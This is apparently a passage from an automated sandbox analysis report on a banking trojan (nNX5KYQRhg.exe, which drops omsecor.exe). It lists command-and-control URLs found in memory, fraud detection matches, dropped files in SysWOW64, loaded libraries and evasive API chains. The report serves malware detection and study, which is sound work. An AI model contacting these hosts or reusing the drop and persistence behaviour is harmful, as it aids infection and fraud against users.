          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/107/805.html(
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/128/758.html
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/171/705.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/171/705.html-2
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/404/921.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/526/179.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/526/179.htmlQ
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/639/772.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/639/772.htmlB
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/639/772.htmlG
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/639/772.htmlK
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/639/772.htmla
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html)n%
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html-2
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html0n:
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html4
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.html5n1
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.htmlena
          Source: omsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/691/461.htmlhtml
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/719/772.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.html22-2
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.html=
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.htmlA
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.htmlb
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006E4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/32.htmli=
          Source: omsecor.exe, 00000008.00000003.3082838886.00000000006D1000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/49.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/761/49.htmlu
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.htmlH
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/810/632.htmly
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/883/755.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/883/755.htmlL
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/97/341.html
          Source: omsecor.exe, 00000008.00000002.3407727881.0000000000195000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://lousta.net/com/p
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.html3
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmlH4
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmlW
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/126/170.htmll4
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/477/877.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html1
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.html1l
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.htmlom/4;ls
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/558/583.htmlp
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.htmlj4
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/87/444.htmlp4
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.html
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.html22658-3693405117-2476
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.htmlBu
          Source: omsecor.exe, 00000002.00000002.2339564374.000000000067E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/922/501.htmlL
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://mkkuei4kdsz.com/932/965.html
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/158/381.html
          Source: omsecor.exe, 00000002.00000002.2339564374.00000000006BF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/158/381.html4u
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.html(
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlKl
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlasuek.com
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/503/726.htmlom/913/437.html
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html)
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html0
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.html9
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlA
          Source: omsecor.exe, 00000005.00000002.2717777167.0000000000194000.00000004.00000010.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmll
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmll%
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmllC
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlo
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlq
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmls
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmlw
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/524/9.htmly
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.html)le
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/640/808.htmlo
          Source: omsecor.exe, 00000005.00000002.2718202902.0000000000737000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.htR
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.html
          Source: omsecor.exe, 00000005.00000002.2718202902.00000000006CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/65/168.htmlU
          Source: omsecor.exe, 00000008.00000002.3408094528.000000000065E000.00000004.00000020.00020000.00000000.sdmp, omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/913/437.html
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/9Sl
          Source: omsecor.exe, 00000005.00000002.2718202902.000000000070E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/Z
          Source: nNX5KYQRhg.exe, omsecor.exe.0.dr, omsecor.exe.2.drString found in binary or memory: http://ow5dirasuek.com/http://mkkuei4kdsz.com/http://lousta.net/http://lousta.net/begun.ruIueiOodcon
          Source: omsecor.exe, 00000008.00000002.3408094528.00000000006A0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ow5dirasuek.com/lousta.net5

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Process Memory Space: nNX5KYQRhg.exe PID: 2848, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 3756, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 1268, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: omsecor.exe PID: 3908, type: MEMORYSTR
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeFile created: C:\Windows\SysWOW64\merocz.xc6Jump to behavior
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_00401C410_2_00401C41
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040D2A40_2_0040D2A4
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040B51C0_2_0040B51C
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CBD00_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_00401C415_2_00401C41
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040D2A45_2_0040D2A4
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040B51C5_2_0040B51C
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040CBD05_2_0040CBD0
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: String function: 00405511 appears 56 times
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: String function: 00405511 appears 56 times
          Source: nNX5KYQRhg.exeStatic PE information: invalid certificate
          Source: nNX5KYQRhg.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: classification engineClassification label: mal100.bank.troj.evad.winEXE@7/3@3/3
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040A057 GetForegroundWindow,CoCreateInstance,SetForegroundWindow,0_2_0040A057
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: nNX5KYQRhg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: nNX5KYQRhg.exeReversingLabs: Detection: 86%
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeFile read: C:\Users\user\Desktop\nNX5KYQRhg.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_5-5766
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: GetCommandLine,DecisionNodes,ExitProcessgraph_0-5765
          Source: unknownProcess created: C:\Users\user\Desktop\nNX5KYQRhg.exe "C:\Users\user\Desktop\nNX5KYQRhg.exe"
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exe
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exe
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomove
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeProcess created: C:\Users\user\AppData\Roaming\omsecor.exe C:\Users\user\AppData\Roaming\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\System32\omsecor.exeJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeProcess created: C:\Windows\SysWOW64\omsecor.exe C:\Windows\SysWOW64\omsecor.exe /nomoveJump to behavior
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\SysWOW64\omsecor.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004032B8 GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,MessageBoxW,VirtualProtect,MessageBoxW,VirtualProtect,VirtualProtect,SetUnhandledExceptionFilter,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_004032B8
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040D293 push ecx; ret 0_2_0040D2A3
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040CBB5 push ecx; ret 0_2_0040CBC8
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040D293 push ecx; ret 5_2_0040D2A3
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040CBB5 push ecx; ret 5_2_0040CBC8

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\SysWOW64\omsecor.exeExecutable created and started: C:\Windows\SysWOW64\omsecor.exeJump to behavior
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeFile created: C:\Users\user\AppData\Roaming\omsecor.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\omsecor.exeFile created: C:\Windows\SysWOW64\omsecor.exeJump to dropped file
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_0040350F
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeCode function: 0_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,0_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_0040350F HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileIntW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_0040350F
          Source: C:\Windows\SysWOW64\omsecor.exeCode function: 5_2_004039EA HeapAlloc,HeapAlloc,GetPrivateProfileStringW,GetPrivateProfileStringW,HeapAlloc,StrStrIW,StrStrIW,GetPrivateProfileStringW,GetPrivateProfileStringW,GetPrivateProfileStringW,5_2_004039EA
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_5-5799
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_0-5799
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: RegOpenKey,DecisionNodes,Sleepgraph_0-5799
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: RegOpenKey,DecisionNodes,ExitProcessgraph_5-5799
          Source: C:\Windows\SysWOW64\omsecor.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_5-5733
          Source: C:\Users\user\Desktop\nNX5KYQRhg.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-5861
